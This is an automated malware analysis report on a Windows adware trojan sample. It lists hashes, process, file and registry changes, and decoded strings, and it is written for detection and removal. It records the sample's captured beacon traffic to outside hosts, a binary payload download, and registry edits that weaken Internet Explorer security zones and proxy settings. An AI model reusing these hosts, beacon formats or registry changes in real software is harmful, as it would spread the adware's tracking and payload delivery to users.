not-a-virus:AdWare.Win32.ConvertAd.awxy (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f9ebaab3623a46eea24892cb54389778
SHA1: b17cb85bfa75ccfd92f4e0eb47deb0d5bacf78b4
SHA256: 01da0ce718aadf7ca409f2796f146ad7673593ce5d85111a39d6fae1620fe0eb
SSDeep: 6144:6YfyYa3oozreDCACaOoa4SwCZo2Qiv GKpqPMN vnoL:LyYxozqmACaOJ4HCkqMN k
Size: 299520 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-30 04:22:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
dwwin.exe:304
%original file name%.exe:580
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
File activity
The process dwwin.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\7F74E.dmp (109504 bytes)
The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\Temp\1.tmp.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f420_appcompat.txt (6214 bytes)
Registry activity
The process dwwin.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C C2 3E BA F5 1D 8D DE 7E E8 83 0B 3C 04 43 F1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C C0 2B 3C F9 B4 99 F3 37 18 05 48 23 C4 3C 91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
dwwin.exe:304
%original file name%.exe:580
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\7F74E.dmp (109504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\Temp\1.tmp.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f420_appcompat.txt (6214 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 223823 | 224256 | 4.49086 | af6d1d07ea6dd24a68328dd6cf3afc83 |
.rdata | 229376 | 50666 | 50688 | 3.48212 | 16bd96038bb455fec443b5caa8f4a38a |
.data | 282624 | 17656 | 8704 | 3.21315 | d8e3ab1c7ae630f53b541d9dd94eb50c |
.rsrc | 303104 | 848 | 1024 | 3.8074 | 2f0a8c4da2bf99bf11bc35e76db0b38e |
.reloc | 307200 | 13646 | 13824 | 3.87773 | 0a3385fed18696464f7957811fd02bc6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://events.datahouse-us.com/Um7UdXgzvHWLL7R | 52.86.227.248 |
hxxp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b | 50.7.86.58 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"1726\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5981\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5729\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5729\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}
GET /SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Sun, 03 Apr 2016 17:16:43 GMT
Content-Type: application/octet-stream
Content-Length: 154218
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=lA5M2
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_580:
.text
`.rdata
.data
.rsrc
@.reloc
FTPWj
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
2nlDP2i6OrSdDSwRegOpenKeyExW
2nlDP2i6OrSdDSwRegCloseKey
Offer.cpp
OfferList.cpp
thread_pool.cpp
2nlDP2i6OrSdDSwWinHttpCrackUrl
2nlDP2i6OrSdDSwHttpSendRequestW
2nlDP2i6OrSdDSwHttpOpenRequestW
CRYPT32.dll
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
ADVAPI32.dll
ole32.dll
GetCPInfo
GetProcessHeap
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x6db97ddc@3constants@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xd8c8bf65@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@precheck@@@tr1@std@@
zcÃ
0 0$0(0,0
6 6(60686
> >$>,>@>`>
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
2nlDP2i6OrSdDSwShlwapi.dll
2nlDP2i6OrSdDSwhttp
2nlDP2i6OrSdDSwchrome
2nlDP2i6OrSdDSwfirefox
W2nlDP2i6OrSdDSwAdvapi32.dll
2nlDP2i6OrSdDSwSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
2nlDP2i6OrSdDSwmscoree.dll
2nlDP2i6OrSdDSwv1.0.3705
2nlDP2i6OrSdDSwKernel32.dll
2nlDP2i6OrSdDSwSoftware\Microsoft\.NETFramework\Policy\v1.0
2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v1.1.4322
2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v2.0.50727
2nlDP2i6OrSdDSwv1.1.4322
2nlDP2i6OrSdDSwv2.0.50727
2nlDP2i6OrSdDSwv4.0.30319
2nlDP2i6OrSdDSwcmd_args
2nlDP2i6OrSdDSwexe_link
2nlDP2i6OrSdDSwreg_keys
2nlDP2i6OrSdDSwreg_keys_post
2nlDP2i6OrSdDSwreg_key
Kernel32.dll
2nlDP2i6OrSdDSw?url=
e.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\CleanBrowser
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\ContentPush
hXXp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b
2nlDP2i6OrSdDSwSoftware\Microsoft\Windows\CurrentVersion\RunOnce
2nlDP2i6OrSdDSwhXXps://livestatscounter.com/Generic/sys/lst.php
2nlDP2i6OrSdDSwHKEY_LOCAL_MACHINE
2nlDP2i6OrSdDSwHKEY_CURRENT_USER
2nlDP2i6OrSdDSwWinhttp.dll
NSIS_Inetc (Mozilla)
2nlDP2i6OrSdDSwWininet.dll
2nlDP2i6OrSdDSwWinInet.dll
2nlDP2i6OrSdDSwContent-Type: application/x-www-form-urlencoded
2nlDP2i6OrSdDSw{"data":"{\"channel_id\":\"%s\",\"event_event_id\":\"%d\",\"utm_addition\":\"%s\",\"guid\":\"%s\",\"offer_id\":\"%s\",\"browser_name\":\"\"}","table":"event_has_user"}
2nlDP2i6OrSdDSwhXXp://events.datahouse-us.com/Um7UdXgzvHWLL7R
c:\%original file name%.exe